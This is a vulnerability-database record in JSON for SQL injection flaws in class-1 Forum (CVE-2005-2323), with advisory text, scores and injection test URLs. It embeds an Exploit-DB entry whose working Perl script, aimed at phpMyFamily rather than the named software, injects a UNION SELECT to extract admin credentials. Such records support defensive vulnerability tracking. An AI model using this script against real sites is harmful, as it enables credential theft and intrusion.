{"type": "osvdb", "published": "2005-07-14T12:10:42", "href": "https://vulners.com/osvdb/OSVDB:17922", "bulletinFamily": "software", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "viewCount": 6, "edition": 1, "reporter": "Lostmon Lords(Lostmon@gmail.com)", "title": "class-1 Forum users.php viewuser_id Variable SQL Injection", "affectedSoftware": [{"operator": "eq", "version": "0.24.4", "name": "class-1 Forum"}, {"operator": "eq", "version": "0.23.2", "name": "class-1 Forum"}], "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2017-04-28T13:20:14", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-2323"]}, {"type": "exploitdb", "idList": ["EDB-ID:1208"]}, {"type": "osvdb", "idList": ["OSVDB:17921", "OSVDB:17923"]}], "modified": "2017-04-28T13:20:14", "rev": 2}, "vulnersScore": 7.2}, "references": [], "id": "OSVDB:17922", "lastseen": "2017-04-28T13:20:14", "cvelist": ["CVE-2005-2323"], "modified": "2005-07-14T12:10:42", "description": "## Vulnerability Description\nclass-1 Forum contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'users.php' script not properly sanitizing user-supplied input to the 'viewuser_id' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nclass-1 Forum contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'users.php' script not properly sanitizing user-supplied input to the 'viewuser_id' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Manual Testing Notes\nhttp://[target]/forum/users.php?mode=viewprofile&viewuser_id=[SQL-Injection]\n## References:\nVendor URL: http://www.class1web.co.uk/download_forum.php\nSecurity Tracker: 1014485\nSecurity Tracker: 1014486\n[Secunia Advisory ID:16078](https://secuniaresearch.flexerasoftware.com/advisories/16078/)\n[Related OSVDB ID: 17920](https://vulners.com/osvdb/OSVDB:17920)\n[Related OSVDB ID: 17923](https://vulners.com/osvdb/OSVDB:17923)\n[Related OSVDB ID: 17921](https://vulners.com/osvdb/OSVDB:17921)\nOther Advisory URL: http://lostmon.blogspot.com/2005/07/class-1-forum-software-cross-site.html\nISS X-Force ID: 21470\n[CVE-2005-2323](https://vulners.com/cve/CVE-2005-2323)\nBugtraq ID: 14261\n"}

{"cve": [{"lastseen": "2020-10-03T11:34:55", "description": "Multiple SQL injection vulnerabilities in Class-1 Forum 0.24.4 and 0.23.2, and Clever Copy with forums installed, allow remote attackers to modify SQL statements via the (1) id parameter to viewattach.php, (2) viewuser_id parameter to users.php, or the (3) id or (4) forum parameter to viewforum.php.", "edition": 3, "cvss3": {}, "published": "2005-07-19T04:00:00", "title": "CVE-2005-2323", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-2323"], "modified": "2008-09-05T20:51:00", "cpe": ["cpe:/a:clever_copy:clever_copy:*", "cpe:/a:class-1:class-1_forum:0.24.4", "cpe:/a:class-1:class-1_forum:0.23.2"], "id": "CVE-2005-2323", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2323", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:class-1:class-1_forum:0.24.4:*:*:*:*:*:*:*", "cpe:2.3:a:clever_copy:clever_copy:*:*:*:*:*:*:*:*", "cpe:2.3:a:class-1:class-1_forum:0.23.2:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:14", "bulletinFamily": "software", "cvelist": ["CVE-2005-2323"], "edition": 1, "description": "## Vulnerability Description\nclass-1 Forum contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'viewattach.php' script not properly sanitizing user-supplied input to the 'id' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nclass-1 Forum contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'viewattach.php' script not properly sanitizing user-supplied input to the 'id' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Manual Testing Notes\nhttp://[target]/forum/viewattach.php?id=[SQL-Injection]\n## References:\nVendor URL: http://www.class1web.co.uk/download_forum.php\nSecurity Tracker: 1014485\nSecurity Tracker: 1014486\n[Secunia Advisory ID:16078](https://secuniaresearch.flexerasoftware.com/advisories/16078/)\n[Related OSVDB ID: 17920](https://vulners.com/osvdb/OSVDB:17920)\n[Related OSVDB ID: 17923](https://vulners.com/osvdb/OSVDB:17923)\n[Related OSVDB ID: 17922](https://vulners.com/osvdb/OSVDB:17922)\nOther Advisory URL: http://lostmon.blogspot.com/2005/07/class-1-forum-software-cross-site.html\nISS X-Force ID: 21470\n[CVE-2005-2323](https://vulners.com/cve/CVE-2005-2323)\nBugtraq ID: 14261\n", "modified": "2005-07-14T12:10:42", "published": "2005-07-14T12:10:42", "href": "https://vulners.com/osvdb/OSVDB:17921", "id": "OSVDB:17921", "type": "osvdb", "title": "class-1 Forum viewattach.php id Variable SQL Injection", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:14", "bulletinFamily": "software", "cvelist": ["CVE-2005-2323"], "edition": 1, "description": "## Vulnerability Description\nclass-1 Forum contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'viewforum.php' script not properly sanitizing user-supplied input to the 'id' and 'forum' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nclass-1 Forum contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'viewforum.php' script not properly sanitizing user-supplied input to the 'id' and 'forum' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Manual Testing Notes\nhttp://[target]/forum/viewforum.php?mode=view&id=[SQL-Injection]\nhttp://[target]/forum/viewforum.php?forum=[SQL-Injection]\n## References:\nVendor URL: http://www.class1web.co.uk/download_forum.php\nSecurity Tracker: 1014485\nSecurity Tracker: 1014486\n[Secunia Advisory ID:16078](https://secuniaresearch.flexerasoftware.com/advisories/16078/)\n[Related OSVDB ID: 17920](https://vulners.com/osvdb/OSVDB:17920)\n[Related OSVDB ID: 17921](https://vulners.com/osvdb/OSVDB:17921)\n[Related OSVDB ID: 17922](https://vulners.com/osvdb/OSVDB:17922)\nOther Advisory URL: http://lostmon.blogspot.com/2005/07/class-1-forum-software-cross-site.html\nISS X-Force ID: 21470\n[CVE-2005-2323](https://vulners.com/cve/CVE-2005-2323)\nBugtraq ID: 14261\n", "modified": "2005-07-14T12:10:42", "published": "2005-07-14T12:10:42", "href": "https://vulners.com/osvdb/OSVDB:17923", "id": "OSVDB:17923", "type": "osvdb", "title": "class-1 Forum viewforum.php Multiple Variable SQL Injection", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T13:46:08", "description": "phpMyFamily <= 1.4.0 SQL Injection Exploit. CVE-2005-2323. Webapps exploit for php platform", "published": "2005-03-27T00:00:00", "type": "exploitdb", "title": "phpMyFamily <= 1.4.0 - SQL Injection Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-2323"], "modified": "2005-03-27T00:00:00", "id": "EDB-ID:1208", "href": "https://www.exploit-db.com/exploits/1208/", "sourceData": "#!/usr/bin/perl -w\r\n# phpMyFamily Exploit injection\r\n# ==============================\r\n$banner = \"phpMyFamily Exploit injection \\n\\n==============================\r\n\\n\\nINFGPG-Hacking&Security Research\";\r\n# \r\n# Greats: AresU (1st IndoSec Team),ADZ Security Team (has discovered bugs)\r\n# Info: 98.to/infamous\r\n\r\nuse IO::Socket;\r\nif ($#ARGV<0){\r\nprint \"\\n$banner\";\r\nprint \"\\n\\n Usage: perl phpMyFamily.pl [host] [path] \\n\\n\";\r\nexit;}\r\n\r\n$gen=\"%20UNION%20SELECT%20NULL,password,NULL,username,NULL,NULL,NULL,NULL,NUL\r\nL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20family_users%20%20WH\r\nERE%20admin='Y'%20LIMIT%201,1\"; # This selects first admin with login &\r\npassword hash :)\r\n\r\n$serius=\"GET $ARGV[1]/$ARGV[2]/people.php?person=00002'$gen HTTP/1.0\\r\\n\\r\\n\";\r\n$muka=IO::Socket::INET->new(Proto=>\"tcp\",PeerAddr=>\"$ARGV[0]\",PeerPort=>\"80\")\r\nor die \"$ARGV[0]Connection Failed !!\\n\\n\";\r\n\r\n$muka -> autoflush(1);\r\nprint $muka \"$serius\"; \r\nprint \"[*]Sending exploit DONE \\n\\n\"; \r\nsleep(7);\r\nclose($muka);\n\n# milw0rm.com [2005-03-27]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1208/"}]}